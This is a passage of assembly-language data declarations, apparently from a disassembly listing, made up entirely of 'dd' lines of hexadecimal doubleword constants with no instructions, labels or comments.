		dd 0B526E05Fh, 0D6640098h, 0D7EFA6E7h, 0A26D998Dh, 29D5DFEFh
		dd 0BA0DBEFCh, 0C1D01F04h, 7C6CA995h, 970F30D1h, 0D0306FA6h
		dd 0F017EEECh, 3DE35273h, 71565705h, 126E75D8h,	296ADD66h
		dd 51710056h, 0FA272D9h, 0CDC6708Eh, 0D5CE95CAh, 6B8B5F9Ch
		dd 463B9CD5h, 3BCDB4D4h, 104C85FDh, 340031FFh, 94C191C5h
		dd 7008AFEAh, 0FD4AA4CAh, 0C47F358Dh, 0B9931F86h, 361547EEh
		dd 0DACD5518h, 0D1AB78AAh, 9DB25576h, 0AAF2A632h, 5CE05071h
		dd 6D14DE15h, 0F841243Fh, 0AD8888C8h, 57C141A9h, 0E03DDDBEh
		dd 60AFF044h, 0FA88098Fh, 357020AAh, 0AA2E217h,	1DA2993Ch
		dd 0C055FF6Eh, 2F6A817Ch, 0FEB1D54Dh, 0FF64B5BAh, 5F817F81h
		dd 1CBCEF04h, 4E7F2DFBh, 13DB34D1h, 0B2142F71h,	0C9D3ECDDh
		dd 0E6F62D2h, 440246EDh, 66B26EADh, 0D9CA0797h,	5EA1B082h
		dd 31349950h, 1CA76850h, 0AD5EA7h, 153083FEh, 445CB82Fh
		dd 8EF5B7FEh, 0AB540156h, 1BB48221h, 4A852D25h,	0D9F0EA62h
		dd 0ABE74ED1h, 773AFE7Fh, 59BC30E8h, 0AE06B490h, 1E674B8Dh
		dd 0DDB299D4h, 21F7638Eh, 8B5AC099h, 0F5E025B5h, 7DCC2F9Ch
		dd 0B2F59271h, 0D41B8828h, 0CBC21148h, 0EF73EFF0h, 0D7FCB72Ah
		dd 2F6C09B4h, 73AEEE71h, 0D0F91823h, 5935E276h,	0F859B26h
		dd 1671CA50h, 0CF07F3CFh, 0B0D10314h, 465525DFh, 0A71286BBh
		dd 7D315693h, 957692A4h, 8499D70Ah, 35DBB4CCh, 0BD22DEDCh
		dd 31C78B7Ah, 995A631Bh, 3A6F8ECEh, 3E454626h, 0EF2FCA1Fh
		dd 0EDF7BE7Bh, 0FE3BCBC8h, 65B535A2h, 54B2FECAh, 6629048Ah
		dd 7BEBCDB6h, 6481B4A1h, 0E22FA915h, 729CDBDh, 8DC5D4B5h
		dd 8D2A2FE4h, 0C5DB3E74h, 648FB31Ch, 0A24EBAEAh, 86A0BF1Bh
		dd 0D50E42A8h, 753D7FC7h, 5537954Dh, 0FEB547B9h, 529F69F0h
		dd 0AD440CD8h, 0D1AE2ECh, 0D1EC4AECh, 7AC8A934h, 660220Fh
		dd 91932E50h, 660C2E89h, 2AE87657h, 32AAB8AEh, 3E39152Dh
		dd 8C5C4BBCh, 25AFD83Fh, 61CBF82h, 3C093954h, 9BC96DDCh
		dd 0F065AB4Eh, 0B3A59BFBh, 5A17D67Bh, 2BB89E90h, 0CD85F18Dh
		dd 2EB5EF71h, 6974CC82h, 6A9C3AB4h, 6C324CEAh, 714BB577h
		dd 0FDB62FF4h, 0E1C44F39h, 3CD6E9FEh, 0D56DDF5Ch, 0AC038CECh
		dd 0BA3F327Ah, 94A43153h, 0D95DD7C8h, 0DFEA93CDh, 129CC22Ah
		dd 5576F38h, 40C24F15h,	538E28D9h, 0F6FAE078h, 0B02574F7h
		dd 2885A26Fh, 0C62B65F2h, 73855F83h, 78DD6899h,	708E2F6Dh
		dd 0DDA253A3h, 0F9AF414Fh, 0C1DA4909h, 6C028363h, 8637DDE4h
		dd 0EFD5F3ABh, 0A2901CF6h, 446A76CBh, 2C712AEBh, 0A97BA342h
		dd 0B46A3E7Bh, 19E241E0h, 95B06A75h, 38BDD35Bh,	2A976861h
		dd 3E925571h, 0C723D6E1h, 12AC13C1h, 0B06B4FA6h, 31ADB728h
		dd 0A556640Bh, 8EEC1D02h, 0E5113DC3h, 83E27995h, 7CC7358Fh
		dd 67458F60h, 0BEC74B75h, 0BAB0F8D0h, 6B42C3CEh, 2FBDDDA7h
		dd 0F005381h, 0C875613Fh, 0B3F0A83Dh, 9F163CCFh, 26E281FFh
		dd 60EB89FFh, 69CDAF9h,	2A166ABFh, 4896A47Eh, 0F4E2896Fh
		dd 8087E196h, 83F4E970h, 53E8A68Bh, 14C551F9h, 0AD178D27h
		dd 6FCC0D43h, 8A0EFBB4h, 0A9A9AA33h, 0D5DEFE6Eh, 8C1BA2D8h
		dd 0F1C18A5Ch, 0E02A7C53h, 12DDF040h, 83EC554h,	5BBF624h
		dd 0FDDB80EAh, 5288DF6Ah, 0A15A6E1Bh, 8D6A354Ah, 0D4715736h
		dd 7AE6E3E2h, 0FA7D579h, 72E541BAh, 7B7258DCh, 9E677837h
		dd 71096DA0h, 2A44FA58h, 87E63A9Ch, 508E0E32h, 0B5A305D2h
		dd 0EDAADDAEh, 8DED3109h, 0CDA443AAh, 0F13ED53Eh, 7DA7CAC3h
		dd 52C8E754h, 71BB4379h, 98165A25h, 3FFC9DE1h, 59591E83h
		dd 0A1AEBFCBh, 33AC742Eh, 7A01399h, 0FE4244BBh,	8DB83C25h
		dd 0B5881F24h, 715261B7h, 14BC7E22h, 9A6E17FAh,	32C80572h
		dd 0DFBB0F86h, 73BE83A3h, 0C262F730h, 0B0CF5042h, 85FE8EB0h
		dd 0BECA6F39h, 1F5C191Bh, 0C4BF9206h, 54EE6F5Ah, 0B368D463h
		dd 72909AABh, 253D8E4h,	0DF626773h, 9733F97h, 397B17EAh
		dd 625DC5FDh, 1F1CADB3h, 6B827C93h, 8F8F0583h, 0AC96AA95h
		dd 2B8AC17h, 1EEDC7CCh,	64BAFD08h, 9DA7EBA5h, 0F25A4776h
		dd 86B61A78h, 0AA81F266h, 595189EEh, 939C6FD6h,	98945549h
		dd 553CBDA3h, 0D126DBC5h, 0F14E354Ah, 864890F4h, 94D7572Dh
		dd 75061573h, 0F4DA7C04h, 6EB61ABEh, 6A72FEF6h,	8102883Ch
		dd 28DD61FDh, 0AB98FD1Dh, 2B859F53h, 60CA1B69h,	78DCF356h
		dd 6DD5EF7Dh, 0DF3DE19Eh, 76E2BD4Ah, 2C3FB789h,	0C1AED55Bh
		dd 767D1DEBh, 0F13ACBC6h, 0C27CA8A0h, 0ADDE7FE1h, 0F0B49C53h
		dd 9DC90F89h, 0F80D5355h, 0F7EBFEF2h, 2D9FDF65h, 1CBF533Fh
		dd 0E4BB209Eh, 7A3F07FDh, 4A9D4495h, 68FB8D9Bh,	0FA45AAADh
		dd 4EE0E8EFh, 0D676A81h
		dd 947A5827h, 0AAB29A6h, 3D1EA51Bh, 0E3C9E395h,	6BB30DFEh
		dd 62DB03B4h, 9A682CE0h, 0E04E264Ah, 7CA8AA20h,	0FA38106h
		dd 46733AB7h, 37933682h, 5FEE30FCh, 0F6C01C1Eh,	0F1F57441h
		dd 0D46F25A3h, 66B0EE76h, 102D17EEh, 0E37CCBECh, 535B52EFh
		dd 166BCF2Dh, 0F74B2642h, 0F2E6F150h, 1A3EB64Ah, 8869EE28h
		dd 3BD3F2A5h, 175A13C1h, 0E7AA3473h, 86B8CD8Ch,	2C98AAC8h
		dd 378B47D4h, 0E16DEF32h, 0EC6722E8h, 5CE6F17h,	1F15F102h
		dd 0D7F897D0h, 706D7208h, 56CCE031h, 0CE1B17CEh, 0C4CDCABAh
		dd 0A06A0F2Dh, 0BF39E667h, 917A9038h, 947B9D09h, 2AFE8B44h
		dd 5F48503Dh, 0B7399469h, 513058BBh, 0DC763F50h, 607DF48h
		dd 0B964A1BDh, 0D7ED8F40h, 0A176B539h, 0A7D9D36Ch, 7010886Ch
		dd 0BDF28575h, 7338CAEh, 1670A87Eh, 0FE0CA570h,	0E3633413h
		dd 0FD93AD4Fh, 6F3624C2h, 94B5CB81h, 580B5089h,	57EAE07Eh
		dd 0F245B519h, 455B5D68h, 4A763EDAh, 9F96007Ah,	5DADF718h
		dd 0A2439E9Fh, 0AA4C0FAh, 0F423E15Dh, 2A8C6996h, 0F3BFA8B4h
		dd 2B8861E3h, 3B04EB94h, 0A833BE91h, 74FD02BEh,	537B6248h
		dd 5292D378h, 0F1E6989Ah, 0FA2BA3DBh, 46D8FF8Bh, 60399B98h
		dd 5E387B36h, 3026F750h, 7F3666B4h, 0D1CAB9Eh, 0DA56DF86h
		dd 0B2B95875h, 0DAB7BFE2h, 55B8E5E5h, 7C665C07h, 0E9182D91h
		dd 4125D986h, 167D5AA1h, 0FAEA98F0h, 0FD95A6AAh, 28AF44D9h
		dd 2E72E5A3h, 44BEA0C1h, 0BDBF1791h, 1B745AA0h,	7D437019h
		dd 5F52D314h, 0BE3E3110h, 2741869Ch, 0C2FA04BFh, 907E3AFDh
		dd 0E50CE0C3h, 0B60415DDh, 72DEA9DCh, 46D545EFh, 503CF6B8h
		dd 0AAE565Ch, 596BC5EBh, 0F8BBC9D4h, 1F315FA1h,	4477B6D0h
		dd 7AFF33ABh, 9D163C33h, 50D111B9h, 7A9D571Fh, 4E484EB6h
		dd 1DDE2BE9h, 9D1B1245h, 0C6FDC5D0h, 0EDA7822Ah, 0C4ADBA0Fh
		dd 3AC91731h, 3CA3FC2Ch, 8F729AEFh, 2FC1BE1Eh, 28669164h
		dd 84DBF565h, 0ABCE5B84h, 1915586Eh, 3416E3E9h,	214A7E55h
		dd 0C395EB82h, 6053AA4Dh, 0E0FB4ABBh, 70ED4F0Fh, 0FCB63C5h
		dd 4B4DB314h, 4343AD17h, 0C8C496EFh, 0EA16EEFEh, 599DEEEEh
		dd 0E5AA8F5Eh, 2907CDF5h, 5953149Ah, 67703F9h, 8A5677BAh
		dd 7B5352BEh, 0C401F449h, 0EF3FA90Bh, 0E932E825h, 1AEBF1D3h
		dd 0A274FD88h, 2B5C1145h, 8F6612B9h, 3B70E5Eh, 28082666h
		dd 0BD981E53h, 0A4BB3FCFh, 0FF725D65h, 4223554h, 7B08EE6Dh
		dd 4BA44BEAh, 0AA184331h, 0AE8F0B38h, 0C5BBEF33h, 0BAFD3B4Dh
		dd 0A378DADFh, 0D1642CD5h, 0D9827101h, 6D43BDBAh, 139A7DBh
		dd 71A65AF1h, 5A4B5CFBh, 0F24A0B62h, 2B510D55h,	2AACB2ABh
		dd 0D6EF9735h, 0DE43C683h, 798BE7F8h, 0FBE08AC9h, 0AFB22B13h
		dd 87E0D600h, 1559E55Ah, 8CC0B85Fh, 0F78893DEh,	1F9CD657h
		dd 30B08DAFh, 0D641F4F7h, 31140917h, 0F5749D18h, 0AA234ED5h
		dd 0A709714Ch, 0B3B338DFh, 7B52B0E7h, 0FC7F0278h, 0C2393FCAh
		dd 9E8EA98Ch, 0C2BBD219h, 7F4B52DBh, 594EB5A2h,	0F688FBB5h
		dd 2D569D55h, 2D1977FAh, 9AC6C4FBh, 8D660D5Bh, 0B017F02Fh
		dd 87529955h, 173EDFDBh, 0F7A7D52Dh, 0D13AE6C1h, 24624D2Ah
		dd 76410470h, 8CA11EF5h, 9EACE46Ah, 728D21B2h, 5CFE5BB5h
		dd 2EDAC937h, 44540ECEh, 2C7852F4h, 752E896Dh, 7A587F56h
		dd 722A3435h, 0B18D8EBFh, 0DFB3BDA3h, 2528D6Ah,	0B0D36433h
		dd 0CD54D7EEh, 0A7678BF9h, 6A2BBDB2h, 0FFA3ACECh, 0DA2125C4h
		dd 0FED519A8h, 0A8CDB74Bh, 0B2E87702h, 8D5A938Bh, 73831C5Ch
		dd 0CCFF3BDEh, 0C88BC983h, 2E326A0Dh, 735EBC79h, 83C19DC1h
		dd 3955EDFCh, 0EFD78974h, 2A71ED81h, 0EDEF16DDh, 0AD0DA544h
		dd 0D957B531h, 517EA624h, 630BF0C6h, 0BEA48573h, 0E2B4EAB7h
		dd 0AA866682h, 7259B8D5h, 1D468211h, 0E43A6170h, 9BC41995h
		dd 3C3CB70Ch, 91A57050h, 0A03A7D5Ch, 1CDC2730h,	0EAA92E5h
		dd 5B6975C2h, 0B34D0A69h, 0C3F0877Fh, 5C786989h, 0C2A01D25h
		dd 3B878EB3h, 747DC9A6h, 1036D35Eh, 0CF46957Bh,	0B9AACDF5h
		dd 0EFB663ACh, 2F09EF7Ah, 34BF835h, 1778951Ah, 59558F09h
		dd 7D02CE5h, 0CC0FC505h, 80B4BF56h, 47E80265h, 0A6F5EC9Dh
		dd 8EFBAFF5h, 0EFCD6577h, 783B722Fh, 4CC6D0A9h,	57540A03h
		dd 0AF91046Dh, 0EF8AE7B3h, 2B7E842Bh, 0DDE37399h, 78571FC2h
		dd 5265F236h, 7F56EDB9h, 79FE27Fh, 0D8171C0Fh, 9D7DD8BCh
		dd 45DD51DEh, 84BE681Ah, 9AD3744Eh, 4E201445h, 8AA472ACh
		dd 31C5E216h, 0AE5ABA8Ah, 0A2BD254Ah, 0F1552A9Dh, 0E086F6A0h
		dd 0D68A354Ch, 6ABDE7ACh, 28A7837h, 7272C469h, 1F9FCA2Fh
		dd 3ACF4338h, 64BF3597h, 0DA930FC6h, 42DD0A08h,	0DCD215CEh
		dd 148E09B6h, 0A632EB80h, 54E37F88h, 0E60786A6h, 0B1C57EBCh
		dd 5DFD859Fh, 7CEADE06h, 39517DA3h, 76CF301h, 0D3D70687h
		dd 0C0F94E09h, 0CD4E26CEh, 8ADA158Dh, 6715CB45h, 96AB24BAh
		dd 105C89C9h, 1077D866h, 0D02A14FCh, 5E78BCA7h,	8B228457h
		dd 7D8AE33Fh, 479F981Bh, 24964687h, 0A9C1E4D5h,	37BD00FEh
		dd 614B4D17h, 0B8EAF3D8h, 9225B614h, 0F6E94649h, 0FB36E2D1h
		dd 194A8B7Eh, 67AFD012h, 78B41A6h, 582BDE86h, 1419B1B4h
		dd 0BF7BFC1Eh, 0ABDA9466h, 0A6CD6D2Eh, 87ED8333h, 0F7E141C2h
		dd 54950835h, 75E2C0F9h, 4FAE4C0Dh, 34B562FDh, 5A2535ABh
		dd 8E897069h, 285B59C5h, 0B171BFBh, 0D8E32B7Dh,	4FBBD317h
		dd 0F603617Fh, 2E503A53h, 18D0D68Dh, 0FD1F6B89h, 4EEFE078h
		dd 0F3C0363Eh, 0D752B4EAh, 0C8B955C4h, 0D2FD212Fh, 1BECDCD8h
		dd 11AACC3Fh, 7E74C833h, 7AA2D891h, 0AA1E3FD0h,	54A0E8EDh
		dd 4E70143Fh, 64736FB4h, 706E3F9Eh, 0CC27DCBAh,	0A0718B2Dh
		dd 902C4E06h, 7AAEBB70h, 0B61A2F7Eh, 0C46AD1D4h, 0F839985Bh
		dd 0E3DE7EF9h, 7F95FA50h, 4AC6F71h, 9F36FEDBh, 0AB5BD1E8h
		dd 0C42A1E74h, 4E0FAC3Ch, 47C16473h, 7C32D9Dh, 0C7DFAC46h
		dd 829865B6h, 8DCF2496h, 21637387h, 0B2B8D0F6h,	7169D4EDh
		dd 1D5777C9h, 8E1F6976h, 0E37DBDC9h, 81E0179Ah,	762D9269h
		dd 8BB37CAEh, 0C16ADB8Ah, 0D61791DEh, 0FE75168Dh, 71DA2C5Dh
		dd 0E55E982Ah, 549AB1EEh, 4AAD03F5h, 0DE0D447Ah, 8BF0FD3Fh
		dd 36D52626h, 0A99B7497h, 0C8F4DDBCh, 0DC1D8DB3h, 0C86861BFh
		dd 0D546D2EFh, 8AE2117Ah, 6AC1C793h, 1E4A8DE6h,	382FB898h
		dd 3DA3B1EFh, 0D18D15CBh, 3660D65Fh, 0E37BFBE2h, 0CAD5617Dh
		dd 0A36517D8h, 82D3D92Dh, 0B1EC6A50h, 0C6F2B7A7h, 5C1F0935h
		dd 15726A6Dh, 0C52F1420h, 0EABEB8DDh, 7F9A2F3Dh, 8D0E40F1h
		dd 0EDB94A96h, 0AD60959Ah, 3C63BBAFh, 45F5E252h, 3625AD1Bh
		dd 0D333BE15h, 8F225189h, 7354323Bh, 0E5FC649h,	82BF4529h
		dd 0F5574EBEh, 8359E178h, 0D43E70F0h, 0BE099C5Dh, 4A6B13Ch
		dd 79F528F6h, 47FC337Bh, 6ACFB837h, 6992B273h, 0FAA5B2AFh
		dd 0D21D3E6Ah, 0A9C87D3Fh, 0DCEB61BBh, 0CDF3B699h, 0EF39112Dh
		dd 2C4EF05Fh, 0C25BC6CCh, 0BA93BB30h, 0E98629C2h, 0BA10943h
		dd 4BA4BED0h, 5C0DCDF1h, 6BD65FEh, 510B7FD7h, 7B68172Fh
		dd 0B90B6B85h, 1245ACC8h, 0CE2EFE19h, 6D6B5202h, 5FC455A8h
		dd 0BB81C162h, 841BA96Eh, 8B4EBE83h, 0D3CB1739h, 0DBCDC044h
		dd 0FB69D13Fh, 0FF4800Ah, 3EA3689h, 9DC5BD3Fh, 473DDD17h
		dd 0D3D9256Dh, 0D80DFCF3h, 0FEE2B05Ch, 0B2F92F8h, 9F99F8BDh
		dd 0F1440DAFh, 5A3BE546h
		dd 56B19950h, 0EE19F8F6h, 23E07BCAh, 9A411BC1h,	242FCB5Bh
		dd 1EE22FEAh, 0D687F62Ah, 0BC25ADB9h, 0F1B57D8Fh, 62CBBA7Eh
		dd 47FBFC51h, 417723DFh, 0F7D95F41h, 0AA981AA7h, 7FC5D589h
		dd 3AC91B65h, 45558F07h, 0CE02BAD7h, 28454240h,	57194F1Ch
		dd 8B370D4Fh, 70ED557Ah, 0DB6E1C90h, 2A1F1BD9h,	2ADDD8C7h
		dd 0C2C58F9Bh, 0F0BD1207h, 5CBFBBFDh, 0AB74FB67h, 0A57DC041h
		dd 505084A9h, 0CC1D20CDh, 0C3C0A696h, 56FB66BBh, 56EDFD6Ah
		dd 9C1F5A87h, 3C76773h,	678B343Fh, 0F3AA9058h, 0BF2520AEh
		dd 4390D6Fh, 669E2C5Dh,	35C333D8h, 0AC35B467h, 1AE93FF8h
		dd 186BF4CEh, 0D8B2E55Ah, 0A78B289Eh, 0A870F9ECh, 821EA3D8h
		dd 8E63D56Bh, 20B6ED55h, 466B70BBh, 8DADFF5Ah, 0A6D51EBDh
		dd 0FAFB77F7h, 0F9AAF217h, 497DF060h, 553256B0h, 85AB9D45h
		dd 45C7ADCCh, 2D2AFC74h, 7B706CBEh, 14B25D01h, 4ED88ECEh
		dd 0AAF0D1FAh, 16503BE2h, 11F0228Dh, 7ECACEA7h,	963F1144h
		dd 8571FF1Ch, 64B7975Bh, 0B4D420C5h, 6A1FC7D9h,	0AA7A58FDh
		dd 0FB8D8839h, 0C4C74480h, 1999F59Fh, 0A3F97B0Eh, 0EDA87EECh
		dd 7835C0C8h, 0DAAB50A1h, 0FBA5F0ADh, 3F0B014h,	7BA3ABFEh
		dd 39561277h, 0E1857FE7h, 9C1E5DDFh, 0E4370119h, 0CCFA9D5Fh
		dd 0E45B2B93h, 44F8ED9Ch, 0C1CACA88h, 0E34F576Fh, 400E8444h
		dd 9707D372h, 6AA9748Bh, 0C90E9505h, 9FEE2CF2h,	908E868Fh
		dd 0A497E4F2h, 83FB49Eh, 31331A78h, 0B4665D2Bh,	371273C7h
		dd 3B119EC1h, 0CEA6ADC1h, 59E20D4Bh, 5BF07B72h,	2A5B970Ah
		dd 1B6663B2h, 8E9246B8h, 16077410h, 7FF03129h, 0F8F5927Eh
		dd 0FB6DCF17h, 0B5AC0DD3h, 786D5E1Fh, 86234AA9h, 2AE591A0h
		dd 0F76758A0h, 0FC8D70EDh, 21973F62h, 8350E457h, 910B2FF8h
		dd 548B34CBh, 1DEC2AF7h, 1D79D5ADh, 879B414Eh, 0C52B778Fh
		dd 6B175585h, 7EEA826Bh, 0F7FC95C7h, 0F38B872Bh, 0B5A2B84Ch
		dd 0EBFC5929h, 0E777E7A7h, 0F237171Dh, 3ACE6933h, 976BEC25h
		dd 99DC7959h, 0DF00EF01h, 0F1CEF041h, 73653408h, 785156AEh
		dd 2DA6A1F0h, 686BB35Fh, 5D611E59h, 6F39D976h, 29476268h
		dd 57CF999Fh, 7D98CD62h, 3E59F276h, 1FF71E77h, 0B437D7DAh
		dd 6921BC67h, 0BE7C23FFh, 1BA95345h, 766D9C5Fh,	0FAC58D89h
		dd 0DB571E7Dh, 9C0F348Ah, 0D86E70DBh, 0F346781Eh, 88BC0BBDh
		dd 0E04DCD6h, 0CC1D42D7h, 8DF9DD27h, 1BE5629Dh,	0F5F06EF5h
		dd 142F81E8h, 0C1759F89h, 0A559850Fh, 90137F4Ah, 0FADCB28Fh
		dd 9ABEA405h, 16B61B9Ah, 0CBDCFCBBh, 7739056Fh,	0D40D6A27h
		dd 9AFBDDBCh, 0E97C7E3Eh, 0ECCC6A81h, 0C1E6B70Bh, 6A15B850h
		dd 7B7D89D1h, 57F45559h, 8FBB61F8h, 1188058Eh, 653CF226h
		dd 293D2B6h, 0AF5A055Bh, 0DF84EB03h, 14D28252h,	0FC534D5Eh
		dd 56766E02h, 0AEA2279Fh, 946B37AFh, 576ED270h,	623EC181h
		dd 4B12AF28h, 7318CA30h, 1AEC4ABh, 97C6530Ch, 0E9ED733Ch
		dd 6DC25D81h, 52197ED3h, 7D8ECB99h, 20C97A31h, 574BCF25h
		dd 7B643319h, 955E8EC1h, 9AE6BB8Bh, 0C78AD1F7h,	0B63C3B6Bh
		dd 23E88358h, 8607D4AFh, 9DF46EF0h, 954EB5C3h, 882E9510h
		dd 6D5C938Bh, 615EFCB8h, 40F39C10h, 7E64DC5Fh, 0DEDACE9Ch
		dd 0B2C71BC8h, 25BF9A30h, 0E93F5E8Eh, 0EC4E7520h, 87E22E4Bh
		dd 6686C3AAh, 0D2167935h, 0FB5ACEA1h, 3354C0B1h, 45E295EDh
		dd 0AD175F4Bh, 3832EB54h, 0A8A4D841h, 3336BA9Eh, 6D3DA289h
		dd 6D44A98Eh, 0A7154447h, 8FA871ACh, 466D5048h,	3F2BEE62h
		dd 0AF33AD04h, 7BF18CC2h, 9150E9E0h, 0AD6BDFF7h, 45DB3553h
		dd 8F8AA979h, 359532D8h, 0A8FBFC5Eh, 0A85A4533h, 6A03C754h
		dd 0A8703355h, 0B22EB89Eh, 9C6310F4h, 191FCDA6h, 0F5CEF03Fh
		dd 565B067Fh, 7AFACCCBh, 1B979695h, 39CCBA6Ch, 701DE708h
		dd 0F968515Ch, 0B1BB8E99h, 4FA14E60h, 0E579BF45h, 3A7FA9BDh
		dd 785F8779h, 0D05197FAh, 0F6C98316h, 691F306Eh, 0CD87A93Fh
		dd 57324383h, 16483F9Ch, 0A0E3B06Ch, 9ED1B762h,	0E581ED25h
		dd 5FBE40A4h, 0EBB982BEh, 965A3F35h, 0BAFBFC6Fh, 9E85884Bh
		dd 2A9F07EBh, 0B79E22Ch, 0D3D1AD55h, 99041A5Ch,	9C84BE1Ah
		dd 0CABAD54h, 0DEB76CAh, 0E848F35Fh, 74AB783Ch,	335910DCh
		dd 6F99E778h, 6BD4508Ah, 8C3A305Dh, 7975B30Ch, 23C6199Fh
		dd 4AB54DD5h, 717A6267h, 0E39574E0h, 745116B8h,	0A4EF7CB4h
		dd 0A6FE2133h, 5FC1EFD7h, 0CA718F4Bh, 5B09F2C3h, 0FBE66160h
		dd 453692CAh, 0D8D0557Bh, 0E3CB90E6h, 36EE0F3h,	9ABC672Bh
		dd 0A4184E4Fh, 42745BFCh, 6612FBDAh, 0FF55FCDDh, 43DB6770h
		dd 1218F71Bh, 65F46A17h, 0A14BD295h, 8A829428h,	4F1A3033h
		dd 34DBAD74h, 2FBCAE82h, 21CEBBADh, 6AB695E1h, 80B34E34h
		dd 3FBE42D0h, 0A93EB113h, 0EA730B6Ah, 0A7C54570h, 0B8F3EBF5h
		dd 0D33EC33Ah, 0C016B04Eh, 140C812Fh, 0E6D2C771h, 0E5D996A8h
		dd 6273065Fh, 0AB47ABF7h, 0ACB533B5h, 9AA29698h, 0AE2443E4h
		dd 0DFAF556Ch, 0D0F08E77h, 0F5B68F8h, 80B8187Ch, 0DE859B1Dh
		dd 60495FA5h, 76C54DEAh, 0C302F97Eh, 0FBBCB5Dh,	0C3F1CE45h
		dd 72D8B0A6h, 581E1B77h, 0BFAAC4A2h, 0DFEB1F0Ah, 0D886C862h
		dd 0F1564052h, 0B57051EEh, 0CB02B45Ah, 0F752289Ah, 4F021F81h
		dd 1C18A619h, 1A80B5F9h, 118AD1ABh, 7F5BC2A1h, 480E43D4h
		dd 1B51ADA1h, 0B2E69DF9h, 3498D713h, 7924E074h,	37C5CE09h
		dd 26A6EEA3h, 7CA0AEADh, 3D73A87h, 6993D2DFh, 4692BBBCh
		dd 0D1F42EEh, 56FECD4Dh, 0D2649429h, 0BDED2345h, 0C7230F33h
		dd 0DBAC62CDh, 2FA257B4h, 0E5C998DAh, 0C024EF6Dh, 45862876h
		dd 0D740F602h, 2AABE649h, 53BAC26Dh, 6EEF8FB3h,	0FBF4FB5Ch
		dd 3F3CFA1Bh, 89C8A85Ah, 0F70B4582h, 4ABDDF70h,	12D5EB27h
		dd 5D98A219h, 7F1AFE1Eh, 24D84A66h, 0F56D5C3Fh,	8AB05812h
		dd 0AB81A0B8h, 0D6810CF8h, 965E9179h, 0E3330607h, 0D0DD8B9Ah
		dd 0FB3FE0F1h, 487F4F60h, 0B4955277h, 49D625C9h, 8F572841h
		dd 0D9900D5Dh, 8E8EDA6Fh, 0F185D5Eh, 4311F230h,	0E0FE7679h
		dd 8537CBF0h, 5CA64EB4h, 68B4F6B6h, 1B452F3Fh, 0B599C462h
		dd 3678E239h, 1F6C40DBh, 0C63E6F5Ah, 920531A0h,	1FBA459Fh
		dd 0B93E61AEh, 70B4F411h, 36EF40E4h, 523EEAC7h,	330F44FDh
		dd 0D6A09E26h, 97A1C762h, 5B86212Bh, 2F83BB25h,	965305F2h
		dd 9DA4BF9Eh, 9BCA8950h, 9B26EC0Eh, 0DF06C2EEh,	0BAFBFEFCh
		dd 64C9151Ah, 0E02F2F19h, 7696DED5h, 14F8F9C6h,	0FCD4289Eh
		dd 0C95A1A4Ah, 0E66F7B8Ah, 0DB4AE073h, 0B5239D8Ch, 0CC0DF875h
		dd 4FA4466Ch, 2F5EDA67h, 5EE2BB8Ch, 0ACE708A8h,	60688CEh
		dd 0BD575389h, 602F5EECh, 766AE24Ah, 54FFA515h,	0A020FDAh
		dd 0F57561EDh, 0A67D4CEEh, 0FDF33579h, 4FE5E405h, 5024FC6Bh
		dd 504804FBh, 55947A95h, 7F0FDE07h, 8BBF967Bh, 0E5B2C144h
		dd 0B41D2C68h, 69533F6Eh, 7AEA8A2Bh, 42FAF592h,	0CF55D49Bh
		dd 0D0CC241Ch, 7FAB9A16h, 56A60BCh, 0C7490AAAh,	0DD6EDDA3h
		dd 0F56DA744h, 3D31C1D3h, 6114B5ADh, 0DC2E7CEBh, 0B2873813h
		dd 1B2D9D2Ah, 97E4E3E1h, 9D1207FDh, 1C5B6036h, 0AB2C4BFh
		dd 3BD77516h, 0E2DC8A2Eh, 5344717Ah, 89E19965h,	607B92D1h
		dd 8E91E18Dh, 0D4AE134Dh, 0CC665C9Bh, 0B47CF6E2h, 0B76FB747h
		dd 0DCE77C8Ch, 0E12B9778h, 0D9A5F107h, 7826C493h, 0BE54C6EAh
		dd 0F2CFA3E6h, 2DAF3975h
		dd 92295269h, 0FB62FC46h, 0AA7EADE0h, 56F60E16h, 2FA407E3h
		dd 524A19D8h, 4FED2CB4h, 3DB03924h, 0B46FDC62h,	9859E6D2h
		dd 4BD2CE05h, 0E1F5FABEh, 0A5BA0F68h, 0DFEEA953h, 0E06BE7CAh
		dd 0F514A397h, 0D8BCA5EDh, 0FF6B72D1h, 45A2E7C6h, 3285E8B5h
		dd 0FBCFA6DEh, 0ABBA257h, 0D75F68ABh, 0A2B440AEh, 9235DAA4h
		dd 389D6CD9h, 21057893h, 0BD7EBD1Ah, 97F3AB6Ch,	0A87E4670h
		dd 0FF37135Ch, 3D474BF9h, 3A6885C4h, 0D19010FDh, 5F0FAEDAh
		dd 0B1F5B2F4h, 0DBD4479Fh, 1C7EBD77h, 0E50E48FDh, 2DDB069Fh
		dd 2E77024Eh, 0E26AB508h, 0D9268323h, 0B7DB54BAh, 0A2E9413h
		dd 0C634E83Eh, 4FD8AD95h, 9C6ABC78h, 508036F6h,	7348D58Fh
		dd 0CDCD7972h, 745D8B3Dh, 0DA979AB4h, 513E2B90h, 0B53A952Bh
		dd 0B03D1EEEh, 0E716E2C7h, 0EBC0BF6Ch, 5BFED6F4h, 19169C00h
		dd 0FC15B43Fh, 0D11C928Fh, 91C1DC7Eh, 0D4EB440Fh, 1F8AF52Bh
		dd 7C06E44Ah, 6F2D255Dh, 48C532EEh, 0E684F689h,	533C2378h
		dd 4A5AC91h, 1282684Eh,	0F6A17F4Fh, 72B5AE82h, 0CCD84DF8h
		dd 0DFCECA0Dh, 35E637E0h, 0FDBA942Bh, 796A1AB5h, 7E66DDA7h
		dd 0FF49F495h, 2755B70Ah, 0DF8D3C62h, 0B607767Ch, 0D5F7F38Eh
		dd 73E35BB0h, 9CEFB409h, 0F76B8EBDh, 3B18CD0Dh,	0D550167Ah
		dd 1CC06B16h, 0B4624192h, 544E42F3h, 13E48954h,	3E69B128h
		dd 2BAD551Dh, 0CC912EBBh, 0F337209Bh, 3FC48B45h, 80A7E8h
		dd 0FBE059DCh, 6E6D9344h, 0CE5E795Bh, 0FE3AF55Eh, 2078126Ch
		dd 0B73C14F0h, 0A250FB7Fh, 9FADCA95h, 0B93F5347h, 0EC622BF5h
		dd 14FE97E5h, 570D78AFh, 5C16566h, 0FF395DCCh, 96C827A3h
		dd 12AEBB9h, 0CDAD7E37h, 31745FA8h, 0E36089FEh,	996AD06Ch
		dd 0F393BA52h, 35D7C4EBh, 3E2357CBh, 5653B4A8h,	3986AAEBh
		dd 9A93DFF9h, 0EEF9CAC6h, 0F1914EDFh, 0E1A4C6Dh, 18DF607h
		dd 83898559h, 0B8EDEFA7h, 0F61FB1FEh, 96C15149h, 0DB4403C3h
